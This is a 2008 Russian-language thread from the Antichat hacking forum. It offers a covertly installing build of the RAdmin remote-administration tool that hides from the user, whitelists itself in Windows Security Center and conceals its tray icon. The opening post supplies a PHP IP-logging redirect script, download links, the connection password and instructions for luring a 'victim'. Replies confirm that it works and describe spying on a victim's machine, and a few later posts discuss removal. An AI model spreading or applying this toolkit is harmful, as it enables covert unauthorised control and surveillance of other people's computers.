Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   Скрытый RAdmin (https://forum.antichat.xyz/showthread.php?t=71426)

k0lbasa 25.05.2008 13:51

Скрытый RAdmin
 
Думаю в этот раздел тема подойдет.
Цитата:

Вашему вниманию представляется уникальная сборка хорошо зарекомендовавшей себя программы удаленного администрирования Remote Administrator© - Скрытый RAdmin.
Уникальность заключается в том, что сам инсталлятор устанавливается скрытно от пользователя, прописывается в список исключений в Windows Security Center (и соответственно разрешает список исключений), полностью прописываются настройки программы (скрытие иконки из system tray, активационный ключ, пароль для соединения и т.д.). Если вы хотите хорошую программу для удаленного наблюдения/администрирования, то Скрытый RAdmin - ваш выбор! Т.к. RAdmin не является программой-шпионом или какой-либо троянской программой, то антивирусы не "ругаются" при установке.
Данная сборка представляет собой полностью скрытый инсталятор!
Пароль в текстовом файле указан.
Чтобы узнать ip:
Регистрируемся на www.2ru.name, создаем файл index.php, где пишем:
PHP код:

<?php
$ip 
getenv ("REMOTE_ADDR");
$FL fopen("log.txt""a+");
fwrite($FL$ip);
fclose($FL);
?>
<?php
header
("Location: http://www.newdomain.ru/newdir/newpage.htm");
exit();
?>

Это запишет адрес зашедшего в лог файл и перебросит на ссылку с радмином
-------------------
То есть вы даете человеку ссылку вида www.****.2ru.name, он по ней переходит, его редиректит на ссылку с радмином, он запускает, затем смотрим его ip в файле log.txt на сервере и управляем компьютером, или просто наблюдаем, если конечно есть внешний Ip у жертвы.
http://rapidshare.com/files/117121427/radmin.rar
Пароль для соединения: privedmidved

Чиловег Ниоткудо 25.05.2008 14:00

ну и зачем эти скрипты?
не каждый пользователь будет качать и запускать на компе хрен знает какие экзешники.

Folc 25.05.2008 14:07

Кто нить тестил? результаты в студию

k0lbasa 25.05.2008 14:16

все работает отлично

Чиловег Ниоткудо 25.05.2008 14:19

жаль что у радмина нет бэкконнекта- так придется постоянно проверять лог, дабы поймать юзера или сканить диапазон на наличие радминовского порта

Folc 25.05.2008 14:23

Цитата:

все работает отлично
Не в обиду но нет ни какой гарантии что это не пинч... Просто вначале пускай протестят люди знающие с опытом а потом и остальные заюзают)

k0lbasa 25.05.2008 14:30

проверка антивирусами
хотел полезным поделиться, а тут не доверяют :mad:

Folc 25.05.2008 14:38

Нет оснований доверять челу у кого 7 постов и 1 репы и то от меня)

Folc 25.05.2008 14:39

Если выложишь видео как это все настраивается и работает тогда тебе многие будут благодарны а пока ждём отзывы

Folc 25.05.2008 14:53

С динамическими IP радмин не пашет?
На сколько я понял файл внутри архива urc.exe это и есть скрытый установщик?

k0lbasa 25.05.2008 15:05

ну может сделаю и видео.
Цитата:

На сколько я понял файл внутри архива urc.exe это и есть скрытый установщик?
да
Цитата:

С динамическими IP радмин не пашет?
пашет, но только до тех пор, пока нету разрыва сессии))))

Чиловег Ниоткудо 25.05.2008 15:08

так ведь с ноября месяца не было разрывов!!!!1

k0lbasa 25.05.2008 15:11

[offtop]отвечайте на мой ответ!!!111[/offtop]

Folc 25.05.2008 15:11

Цитата:

ну может сделаю и видео
Давай делай видео, с меня ещё плюсеги будут за видео, а то не могу разобраться.

atix 25.05.2008 15:18

Респект.Работает.Главное чтобы в ближайшее время не пальнули.

atix 25.05.2008 15:20

а чего там разбиратся?Кинул жертве,у себя в вьювере вписал -пасс и погнал.Пробовал у себя в локалке

Folc 25.05.2008 15:23

Цитата:

а чего там разбиратся?Кинул жертве,у себя в вьювере вписал -пасс и погнал.Пробовал у себя в локалке
Хорошо теперь другой вопрос, как ты будешь узнавать Ip если ты по инету будешь кидать этот скрытый сервер

k0lbasa 25.05.2008 16:14

надеюсь из этого раздела не удалят

Чиловег Ниоткудо 25.05.2008 16:17

Цитата:

Сообщение от Folc
Хорошо теперь другой вопрос, как ты будешь узнавать Ip если ты по инету будешь кидать этот скрытый сервер

так для этого в первом посте есть скриптенг

Folc 25.05.2008 16:48

Эт надо заставить жертву скачать сервер, запустить его и зайти на сайтег, чтоб узнать Ip

k0lbasa 25.05.2008 16:59

Цитата:

Сообщение от Folc
Эт надо заставить жертву скачать сервер, запустить его и зайти на сайтег, чтоб узнать Ip

нет, жертва заходит на сайт (айпи сразу записался в лог), и редиректит на ссылку с установщиком

Folc 25.05.2008 17:10

Цитата:

ет, жертва заходит на сайт (айпи сразу записался в лог), и редиректит на ссылку с установщиком
В первом посте есть скрипт на редерект, только куда его писать я не знаю(чайник в php)

k0lbasa 25.05.2008 17:29

просто замени ссылку, что непонятного. хотя там и так редиректит на вэбфайл с радмином этим.

Zolden 25.05.2008 17:56

Цитата:

Сообщение от k0lbasa
проверка антивирусами
хотел полезным поделиться, а тут не доверяют :mad:

доверие тут месяцами получаешь

Folc 25.05.2008 18:19

Теперь вопрос противоположного плана, как эту заразу удалить с зараженного компа

Folc 25.05.2008 18:22

Цитата:

бляяяяя нахуя удалять?
Мало ли просто интересно стало

-Concord- 25.05.2008 18:27

перезалить на другой файл-хостинг кто-нить может?)

Zolden 25.05.2008 18:44

Цитата:

Сообщение от -Concord-
перезалить на другой файл-хостинг кто-нить может?)

http://www.rapidshare.ru/684050
http://depositfiles.com/files/5588560

Zolden 25.05.2008 19:20

протестил снифером, при запуске никуда ниче не отсылалося))))

Можно вот на счет IP попонятнее... непойму где он отображаться должен?

atix 25.05.2008 20:12

Интересно было наблюдать за жертвой.Но когда я увидел что в процессах у него r_serv я охренел.Он его завершил и я отрубился.Как такое может быть?Предполагаю что у него свой радмин,однако хреново что при его отключение отключается и мой.

Чиловег Ниоткудо 25.05.2008 20:13

r_serv - это сервер радмина. что тебя удивило?
это ж не вьюер

atix 25.05.2008 20:21

я понимаю что это сервер,но когда я запускаю этот трой,если его можно так назвать,у меня в процессах ничего не появляется.

k0lbasa 25.05.2008 20:21

Цитата:

Можно вот на счет IP попонятнее... непойму где он отображаться должен?
на сервере в файле log.txt

Zolden 25.05.2008 20:25

Цитата:

Сообщение от k0lbasa
на сервере в файле log.txt

Да вот напрочь отказывается туда что либо записываться.
на index.php и на log.txt поставил параметр 777

k0lbasa 25.05.2008 20:30

индекс - 644
лог - 666

Folc 25.05.2008 21:21

У меня все IP лежат в log.txt

Folc 25.05.2008 21:27

так чё ни кто не знает как убить эту заразу

k0lbasa 25.05.2008 21:52

в процессах и в windows/где-то там

life_is_shit 26.05.2008 01:10

Посмотри автозапуск здесь (XP):
1) пуск->выполнить->regedit->HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run b и на всякий RunOnce
2) либо пуск->выполнить->msconfig->автозапуск.
если там ничего не найдет, ставь каспера он должен все найти.

Folc 26.05.2008 06:34

Цитата:

Посмотри автозапуск здесь (XP):
1) пуск->выполнить->regedit->HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur r entVersion\Run b и на всякий RunOnce
2) либо пуск->выполнить->msconfig->автозапуск.
если там ничего не найдет, ставь каспера он должен все найти.
Каспер не найдёт, это не трой прога.


Время: 01:38